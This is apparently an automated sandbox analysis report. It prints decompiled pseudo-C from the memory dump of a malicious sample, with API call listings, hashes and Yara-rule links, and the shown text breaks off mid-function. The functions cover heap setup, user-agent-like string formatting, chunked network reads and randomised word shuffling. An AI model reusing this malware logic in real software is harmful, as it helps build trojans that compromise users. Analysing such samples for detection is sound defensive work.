                                                                                                                          • String ID:
                                                                                                                          • API String ID: 507476733-0
                                                                                                                          • Opcode ID: 73b12465e3b5081cacde26458d890747c33c006f854e66eafbee728926d865c9
                                                                                                                          • Instruction ID: 9252f365f2961ac9acc174929567917c4275ad175af24e0dd4a1d28c62cb310c
                                                                                                                          • Opcode Fuzzy Hash: 73b12465e3b5081cacde26458d890747c33c006f854e66eafbee728926d865c9
                                                                                                                          • Instruction Fuzzy Hash: BC11E576A413057BE7206F74DC0AF6B77A9EB48355F004129FB15C6280FBB8F941CAA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD520D, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E04CD520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04CD154A();
				if(_t21 != 0) {
					_t59 =  *0x4cdd294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4cdd294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4cdd12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04CD21DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4cdd2e0; // 0xbda5a8
					if( *0x4cdd294 > 5) {
						_t8 = _t26 + 0x4cde5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4cde9f9; // 0x44283a44
						_t27 = _t7;
					}
					E04CD11F4(_t27, _t27);
					_t31 = E04CD3598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x4cdd2a8 =  *0x4cdd2a8 ^ 0x81bbe65d;
						_t32 = E04CD75F6(0x60);
						 *0x4cdd364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4cdd364; // 0x58b95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4cdd364; // 0x58b95b0
							 *_t51 = 0x4cde823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4cdd270, 0, 0x43);
							 *0x4cdd300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4cdd294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4cdd2e0; // 0xbda5a8
								_t13 = _t58 + 0x4cde55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4cdc2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04CDA82B( ~_v8 &  *0x4cdd2a8, 0x4cdd00c); // executed
								_t42 = E04CD4C40(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04CD74A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04CD5461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04CD3FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4cdd128();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E04CD5AB2(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                                                                                                          0x04cd520d
                                                                                                                          0x04cd5218
                                                                                                                          0x04cd521b
                                                                                                                          0x04cd521e
                                                                                                                          0x04cd5221
                                                                                                                          0x04cd5228
                                                                                                                          0x04cd522a
                                                                                                                          0x04cd5236
                                                                                                                          0x04cd5238
                                                                                                                          0x04cd5238
                                                                                                                          0x04cd5241
                                                                                                                          0x04cd5247
                                                                                                                          0x04cd524c
                                                                                                                          0x04cd5266
                                                                                                                          0x04cd5272
                                                                                                                          0x04cd5274
                                                                                                                          0x04cd5279
                                                                                                                          0x04cd5283
                                                                                                                          0x04cd5283
                                                                                                                          0x04cd527b
                                                                                                                          0x04cd527b
                                                                                                                          0x04cd527b
                                                                                                                          0x04cd527b
                                                                                                                          0x04cd528a
                                                                                                                          0x04cd5297
                                                                                                                          0x04cd529e
                                                                                                                          0x04cd52a3
                                                                                                                          0x04cd52a3
                                                                                                                          0x04cd52ab
                                                                                                                          0x04cd52ae
                                                                                                                          0x04cd52d4
                                                                                                                          0x04cd52e0
                                                                                                                          0x04cd52e5
                                                                                                                          0x04cd52ea
                                                                                                                          0x04cd52ec
                                                                                                                          0x04cd5318
                                                                                                                          0x04cd531a
                                                                                                                          0x04cd52ee
                                                                                                                          0x04cd52f2
                                                                                                                          0x04cd52f7
                                                                                                                          0x04cd52fc
                                                                                                                          0x04cd5303
                                                                                                                          0x04cd5309
                                                                                                                          0x04cd530e
                                                                                                                          0x04cd5314
                                                                                                                          0x04cd531b
                                                                                                                          0x04cd531d
                                                                                                                          0x04cd531f
                                                                                                                          0x04cd532e
                                                                                                                          0x04cd5334
                                                                                                                          0x04cd5339
                                                                                                                          0x04cd533b
                                                                                                                          0x04cd536b
                                                                                                                          0x04cd536d
                                                                                                                          0x04cd533d
                                                                                                                          0x04cd533d
                                                                                                                          0x04cd5343
                                                                                                                          0x04cd5350
                                                                                                                          0x04cd5356
                                                                                                                          0x04cd5356
                                                                                                                          0x04cd535e
                                                                                                                          0x04cd5367
                                                                                                                          0x04cd536e
                                                                                                                          0x04cd5370
                                                                                                                          0x04cd5372
                                                                                                                          0x04cd5379
                                                                                                                          0x04cd5386
                                                                                                                          0x04cd538b
                                                                                                                          0x04cd5390
                                                                                                                          0x04cd5392
                                                                                                                          0x04cd5394
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd5396
                                                                                                                          0x04cd539b
                                                                                                                          0x04cd539d
                                                                                                                          0x04cd53a4
                                                                                                                          0x04cd53a8
                                                                                                                          0x04cd53ab
                                                                                                                          0x04cd53c0
                                                                                                                          0x04cd53c4
                                                                                                                          0x04cd53c9
                                                                                                                          0x00000000
                                                                                                                          0x04cd53c9
                                                                                                                          0x04cd53ad
                                                                                                                          0x04cd53af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd53ba
                                                                                                                          0x04cd53bc
                                                                                                                          0x04cd53be
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd53be
                                                                                                                          0x04cd53a1
                                                                                                                          0x04cd53a1
                                                                                                                          0x04cd5372
                                                                                                                          0x04cd52b0
                                                                                                                          0x04cd52b0
                                                                                                                          0x04cd52b5
                                                                                                                          0x04cd53cb
                                                                                                                          0x04cd53cf
                                                                                                                          0x04cd53d7
                                                                                                                          0x04cd53d7
                                                                                                                          0x00000000
                                                                                                                          0x04cd53cf
                                                                                                                          0x04cd52bb
                                                                                                                          0x04cd52be
                                                                                                                          0x04cd52c8
                                                                                                                          0x04cd52cf
                                                                                                                          0x00000000
                                                                                                                          0x04cd53df
                                                                                                                          0x04cd53df
                                                                                                                          0x04cd53e3
                                                                                                                          0x04cd53e7
                                                                                                                          0x04cd53e7

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD154A: GetModuleHandleA.KERNEL32(4C44544E,00000000,04CD5226,00000000,00000000), ref: 04CD1559
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04CD52A3
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • memset.NTDLL ref: 04CD52F2
                                                                                                                          • RtlInitializeCriticalSection.NTDLL(058B9570), ref: 04CD5303
                                                                                                                            • Part of subcall function 04CD3FC2: memset.NTDLL ref: 04CD3FD7
                                                                                                                            • Part of subcall function 04CD3FC2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04CD4019
                                                                                                                            • Part of subcall function 04CD3FC2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04CD4024
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04CD532E
                                                                                                                          • wsprintfA.USER32 ref: 04CD535E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4246211962-0
                                                                                                                          • Opcode ID: 157a5651907394273f4ad9f454cf2e0da2d5a7c59075da1fc49e5bda10c5b418
                                                                                                                          • Instruction ID: 5e87f684d1100107748061eb23e620ae73c5c1eba2b383b95f80dddf07f730d2
                                                                                                                          • Opcode Fuzzy Hash: 157a5651907394273f4ad9f454cf2e0da2d5a7c59075da1fc49e5bda10c5b418
                                                                                                                          • Instruction Fuzzy Hash: 0E51B375E42215BBEB11AFA4DC89B7E77BAEB04714F440426E702D7180E7B8FE449B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD78E6, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 22%
                                                                                                                          			E04CD78E6(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04CD75F6(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04CD4AAB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04CD75F6((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x4cdd2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                                                                                          0x04cd78ed
                                                                                                                          0x04cd78f4
                                                                                                                          0x04cd78f9
                                                                                                                          0x04cd78fc
                                                                                                                          0x04cd7903
                                                                                                                          0x04cd7906
                                                                                                                          0x04cd7909
                                                                                                                          0x04cd790e
                                                                                                                          0x04cd7913
                                                                                                                          0x04cd7a67
                                                                                                                          0x04cd7a69
                                                                                                                          0x04cd7a6b
                                                                                                                          0x04cd7a70
                                                                                                                          0x04cd7a70
                                                                                                                          0x04cd7919
                                                                                                                          0x04cd791c
                                                                                                                          0x04cd791f
                                                                                                                          0x04cd7921
                                                                                                                          0x04cd7921
                                                                                                                          0x04cd7925
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7929
                                                                                                                          0x04cd7955
                                                                                                                          0x04cd795a
                                                                                                                          0x04cd795c
                                                                                                                          0x04cd795c
                                                                                                                          0x04cd795f
                                                                                                                          0x04cd7962
                                                                                                                          0x04cd7962
                                                                                                                          0x04cd7964
                                                                                                                          0x00000000
                                                                                                                          0x04cd792f
                                                                                                                          0x04cd7931
                                                                                                                          0x04cd7950
                                                                                                                          0x04cd7950
                                                                                                                          0x04cd7967
                                                                                                                          0x04cd7967
                                                                                                                          0x04cd7968
                                                                                                                          0x04cd7968
                                                                                                                          0x04cd796b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd796b
                                                                                                                          0x04cd7935
                                                                                                                          0x04cd797c
                                                                                                                          0x04cd7980
                                                                                                                          0x04cd7a5a
                                                                                                                          0x04cd7a5c
                                                                                                                          0x04cd7a5c
                                                                                                                          0x04cd7a5d
                                                                                                                          0x04cd7a60
                                                                                                                          0x00000000
                                                                                                                          0x04cd7a60
                                                                                                                          0x04cd7989
                                                                                                                          0x04cd799a
                                                                                                                          0x04cd799e
                                                                                                                          0x04cd7a56
                                                                                                                          0x00000000
                                                                                                                          0x04cd7a56
                                                                                                                          0x04cd79a4
                                                                                                                          0x04cd79a7
                                                                                                                          0x04cd79ab
                                                                                                                          0x04cd79af
                                                                                                                          0x04cd79b4
                                                                                                                          0x04cd7a4c
                                                                                                                          0x04cd7a4c
                                                                                                                          0x00000000
                                                                                                                          0x04cd7a52
                                                                                                                          0x04cd79bf
                                                                                                                          0x04cd79c8
                                                                                                                          0x04cd79dc
                                                                                                                          0x04cd79e3
                                                                                                                          0x04cd79f8
                                                                                                                          0x04cd79fe
                                                                                                                          0x04cd7a06
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7a08
                                                                                                                          0x04cd7a08
                                                                                                                          0x04cd7a08
                                                                                                                          0x04cd7a0f
                                                                                                                          0x04cd7a17
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7a19
                                                                                                                          0x04cd7a22
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7a24
                                                                                                                          0x04cd7a26
                                                                                                                          0x04cd7a29
                                                                                                                          0x04cd7a29
                                                                                                                          0x04cd7a2c
                                                                                                                          0x04cd7a30
                                                                                                                          0x04cd7a33
                                                                                                                          0x04cd7a39
                                                                                                                          0x04cd7a3c
                                                                                                                          0x04cd7a43
                                                                                                                          0x00000000
                                                                                                                          0x04cd79bf
                                                                                                                          0x04cd793a
                                                                                                                          0x04cd7942
                                                                                                                          0x04cd7948
                                                                                                                          0x04cd794a
                                                                                                                          0x04cd794a
                                                                                                                          0x04cd794d
                                                                                                                          0x04cd794f
                                                                                                                          0x00000000
                                                                                                                          0x04cd794f
                                                                                                                          0x04cd7929
                                                                                                                          0x04cd796f
                                                                                                                          0x04cd7974
                                                                                                                          0x04cd7976
                                                                                                                          0x04cd7976
                                                                                                                          0x04cd7979
                                                                                                                          0x04cd7979
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04CD79E3
                                                                                                                          • lstrcat.KERNEL32(69B25F45,00000020), ref: 04CD79F8
                                                                                                                          • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04CD7A0F
                                                                                                                          • lstrlen.KERNEL32(69B25F45), ref: 04CD7A33
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3214092121-3916222277
                                                                                                                          • Opcode ID: 2e23922216b9dae6cd2419e2777f35fc2c74473d3e1b735eff3a77df9c0ddfd6
                                                                                                                          • Instruction ID: 2697409b36f9c3dfb4531dc92490ba8f7ab95cce6b2279836e0ef319287cebab
                                                                                                                          • Opcode Fuzzy Hash: 2e23922216b9dae6cd2419e2777f35fc2c74473d3e1b735eff3a77df9c0ddfd6
                                                                                                                          • Instruction Fuzzy Hash: B451AE36A02218EBDF11DF99C584BADBBB7FF45314F05906AEA19AB205C770BB51CB40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD4F07, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 62%
                                                                                                                          			E04CD4F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0x4cdd130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E04CD75F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x4cdd2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E04CD4AAB(_v20);
											if(_v8 == 0) {
												_t54 = E04CD3B3F(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E04CD121A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}



























                                                                                                                          0x04cd4f08
                                                                                                                          0x04cd4f0e
                                                                                                                          0x04cd4f19
                                                                                                                          0x04cd4f19
                                                                                                                          0x04cd4f1b
                                                                                                                          0x04cd7613
                                                                                                                          0x04cd7616
                                                                                                                          0x04cd761f
                                                                                                                          0x04cd7622
                                                                                                                          0x04cd7625
                                                                                                                          0x04cd762d
                                                                                                                          0x04cd772b
                                                                                                                          0x04cd7731
                                                                                                                          0x04cd7739
                                                                                                                          0x04cd773b
                                                                                                                          0x00000000
                                                                                                                          0x04cd773b
                                                                                                                          0x04cd7633
                                                                                                                          0x04cd7636
                                                                                                                          0x04cd773e
                                                                                                                          0x04cd773e
                                                                                                                          0x04cd763c
                                                                                                                          0x04cd7643
                                                                                                                          0x04cd764b
                                                                                                                          0x04cd7722
                                                                                                                          0x04cd7651
                                                                                                                          0x04cd7657
                                                                                                                          0x04cd765c
                                                                                                                          0x04cd7661
                                                                                                                          0x04cd7710
                                                                                                                          0x04cd7667
                                                                                                                          0x00000000
                                                                                                                          0x04cd7667
                                                                                                                          0x04cd7667
                                                                                                                          0x04cd7667
                                                                                                                          0x04cd7667
                                                                                                                          0x04cd766c
                                                                                                                          0x04cd766e
                                                                                                                          0x04cd766e
                                                                                                                          0x04cd767b
                                                                                                                          0x04cd7683
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd7685
                                                                                                                          0x04cd7692
                                                                                                                          0x04cd7698
                                                                                                                          0x04cd7698
                                                                                                                          0x04cd769b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd769d
                                                                                                                          0x04cd76a8
                                                                                                                          0x04cd76bc
                                                                                                                          0x04cd76f2
                                                                                                                          0x04cd76be
                                                                                                                          0x04cd76be
                                                                                                                          0x04cd76c5
                                                                                                                          0x04cd76cd
                                                                                                                          0x00000000
                                                                                                                          0x04cd76cf
                                                                                                                          0x04cd76cf
                                                                                                                          0x04cd76d5
                                                                                                                          0x04cd76dd
                                                                                                                          0x04cd76e4
                                                                                                                          0x00000000
                                                                                                                          0x04cd76e4
                                                                                                                          0x04cd76dd
                                                                                                                          0x04cd76cd
                                                                                                                          0x04cd76f5
                                                                                                                          0x04cd76f8
                                                                                                                          0x04cd7700
                                                                                                                          0x04cd7706
                                                                                                                          0x04cd770b
                                                                                                                          0x04cd770b
                                                                                                                          0x00000000
                                                                                                                          0x04cd7700
                                                                                                                          0x04cd76a5
                                                                                                                          0x00000000
                                                                                                                          0x04cd76e7
                                                                                                                          0x04cd76e7
                                                                                                                          0x00000000
                                                                                                                          0x04cd76f0
                                                                                                                          0x04cd7717
                                                                                                                          0x04cd7717
                                                                                                                          0x04cd771d
                                                                                                                          0x04cd771d
                                                                                                                          0x04cd764b
                                                                                                                          0x04cd7636
                                                                                                                          0x04cd7748
                                                                                                                          0x04cd4f10
                                                                                                                          0x04cd4f10
                                                                                                                          0x04cd4f17
                                                                                                                          0x04cd4f22
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd4f17

                                                                                                                          APIs
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 04CD76AF
                                                                                                                          • GetLastError.KERNEL32 ref: 04CD76CF
                                                                                                                            • Part of subcall function 04CD121A: wcstombs.NTDLL ref: 04CD12DC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2344289193-0
                                                                                                                          • Opcode ID: 84d34e5da260f623c26dd80c385cc43435bea72fec4e1fffaaff85124c57aa38
                                                                                                                          • Instruction ID: 865a21448199ee696c3ef8053f416ef27529161a234ddf8b8398583b1fc04235
                                                                                                                          • Opcode Fuzzy Hash: 84d34e5da260f623c26dd80c385cc43435bea72fec4e1fffaaff85124c57aa38
                                                                                                                          • Instruction Fuzzy Hash: 0D414F74D02219EFDF11AFA9C984AAEBBBAFF04344F144869E602E3110E734AE41DB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD3DA0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SysAllocString.OLEAUT32(80000002), ref: 04CD3DFD
                                                                                                                          • SysAllocString.OLEAUT32(04CD28D9), ref: 04CD3E41
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD3E55
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 04CD3E63
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: String$AllocFree
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 344208780-0
                                                                                                                          • Opcode ID: c278062c9d8eac3a5da27d894e3ebeabe4289d4952fcc77b18187c5960312da0
                                                                                                                          • Instruction ID: f7f94b093bb63511ffe7da27aa5ed6395ed3e4d6250fc17570a412759003bdea
                                                                                                                          • Opcode Fuzzy Hash: c278062c9d8eac3a5da27d894e3ebeabe4289d4952fcc77b18187c5960312da0
                                                                                                                          • Instruction Fuzzy Hash: 96311276900249EFCB05DF98D8C49AE7BB5FF48340B14842EFA069B290D774EA41CFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD9311, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 50%
                                                                                                                          			E04CD9311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x4cdd364; // 0x58b95b0
